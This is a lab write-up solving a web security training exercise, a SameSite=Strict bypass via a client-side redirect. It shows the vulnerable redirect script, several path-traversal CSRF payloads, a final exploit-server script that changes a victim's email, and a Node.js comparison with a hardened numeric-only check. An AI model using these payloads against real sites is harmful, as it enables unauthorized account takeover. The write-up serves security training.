SameSite Strict Bypass via Client-Side Redirect
Lab
SameSite Strict bypass via client-side redirect · Practitioner
Solution
Given: the now-familiar email change form. Log in and look at the session cookie the server sets:
set-cookie: session=TkCuL6az98ZphhtL0tfC47tfHD8bAIRT; Secure; HttpOnly; SameSite=Strict
This time it's SameSite=Strict: the browser omits the cookie from every cross-site request, including the top-level GET navigation that worked in the previous lab, so the server sees an unauthenticated request. The hint points at a client-side redirect. The reason that matters: a navigation performed by the target site's own JavaScript (window.location = ...) counts as a new, same-site request, so the browser attaches Strict cookies to it, whereas a server-side 3xx redirect inherits the cross-site context of the original request and does not help. So we need a page on the site that redirects based on input we control. Let's find it.
Go to the site, open a post — there's a comment submission form:
postId=4&comment=1223&name=HUUU&email=r%40t.ru&website=https%3A%2F%2Flab.apsyleg.ru
Submit: a POST request fires and the response is a 302 to /post/comment/confirmation?postId=4. Then, after 3 seconds, a client-side redirect to /post/4.
Look at the source of /post/comment/confirmation. It loads the script /resources/js/commentConfirmationRedirect.js and calls:
<script>redirectOnConfirmation('/post');</script>
Script contents:
redirectOnConfirmation = (blogPath) => {
    setTimeout(() => {
        // postId is read straight from the query string of the current page...
        const url = new URL(window.location);
        const postId = url.searchParams.get("postId");
        // ...and concatenated into the redirect target without any validation
        window.location = blogPath + '/' + postId;
    }, 3000);
}
postId is concatenated unchecked, so a value starting with ../ escapes /post/: the browser normalizes /post/../my-account/... to /my-account/.... The injection could look like this (remembering the _method override, which lets the email change go through as a GET):
../my-account/change-email?_method=POST&email=hacked@b.ru
And the URL itself:
/post/comment/confirmation?postId=../my-account/change-email?_method=POST&email=x@x.ru
The response is "Missing parameter: 'submit'". Something's missing, so go check how the legitimate email-change form works. Indeed, we also need to pass submit=1:
/post/comment/confirmation?postId=../my-account/change-email?_method=POST&email=x@x.ru&submit=1
Final payload, served from the exploit server (the victim's browser navigates to the confirmation page, and the site's own script then performs the cookie-bearing redirect):
<script>
location = 'https://0a02006f03fc7e2f82b0a17e007f00dd.web-security-academy.net/post/comment/confirmation?postId=../my-account/change-email?_method=POST&email=x@x.ru&submit=1';
</script>
Didn't work: the parameters after the first & got cut off. The unencoded & is a separator in the confirmation page's own query string, so searchParams.get("postId") returns only ../my-account/change-email?_method=POST, while email and submit become parameters of the confirmation URL and never reach the redirect. So let's percent-encode ? and & (%3f and %26): they then belong to the postId value, searchParams decodes them, and the script pastes the literal characters into the redirect target:
<script>
location = 'https://0a02006f03fc7e2f82b0a17e007f00dd.web-security-academy.net/post/comment/confirmation?postId=../my-account/change-email%3f_method=POST%26email=x@x.ru%26submit=1';
</script>
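Why the encoded payload works and the first one does not, shown as an added example (this is not the lab's code and not from the original writeup): the block below re-implements the postId-to-location step of commentConfirmationRedirect.js offline, resolves the result the way the browser does, and puts a hardened variant beside it that only accepts a numeric postId (the numeric format is an assumption). The lab host and the two payload URLs are the ones used above.

```javascript
// Added example, not the lab's own code: re-implements the postId-to-location
// logic of commentConfirmationRedirect.js without the navigation, so the two
// payloads from the writeup can be compared offline. Run with: node redirect.js
// The host below is the lab instance from the writeup; the URL shape is the lab's.

const LAB_ORIGIN = 'https://0a02006f03fc7e2f82b0a17e007f00dd.web-security-academy.net';

// What the lab script does inside setTimeout, minus the window.location
// assignment: read postId from the current URL and glue it onto blogPath
// unchecked. The relative result is resolved against the confirmation page,
// exactly as the browser does, which collapses the "../" segment.
function computeRedirect(confirmationUrl, blogPath = '/post') {
  const url = new URL(confirmationUrl);
  const postId = url.searchParams.get('postId');
  return new URL(blogPath + '/' + postId, url).href;
}

// Hardened variant (assumption: post IDs are decimal integers). Anything else,
// including traversal segments or an embedded query string, is rejected, so
// the page can no longer be used as a cookie-bearing redirector.
function computeRedirectSafe(confirmationUrl, blogPath = '/post') {
  const url = new URL(confirmationUrl);
  const postId = url.searchParams.get('postId');
  if (postId === null || !/^\d+$/.test(postId)) return null;
  return new URL(blogPath + '/' + postId, url).href;
}

// First attempt from the writeup: ? and & left as-is, so & splits the
// confirmation page's own query string and postId ends at "_method=POST".
const PAYLOAD_UNENCODED = LAB_ORIGIN +
  '/post/comment/confirmation?postId=../my-account/change-email?_method=POST&email=x@x.ru&submit=1';

// Working payload: ? and & percent-encoded so they stay inside the postId value
// until searchParams.get() decodes them.
const PAYLOAD_ENCODED = LAB_ORIGIN +
  '/post/comment/confirmation?postId=../my-account/change-email%3f_method=POST%26email=x@x.ru%26submit=1';

for (const p of [PAYLOAD_UNENCODED, PAYLOAD_ENCODED]) {
  console.log('confirmation URL :', p);
  console.log('vulnerable script:', computeRedirect(p));
  console.log('hardened script  :', computeRedirectSafe(p));
  console.log();
}
```

The vulnerable path turns the encoded payload into the complete change-email request (/my-account/change-email?_method=POST&email=x@x.ru&submit=1), while the unencoded one arrives with only _method=POST because email and submit stayed on the confirmation URL; the hardened path rejects both payloads and still maps postId=4 to /post/4.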
Lab solved.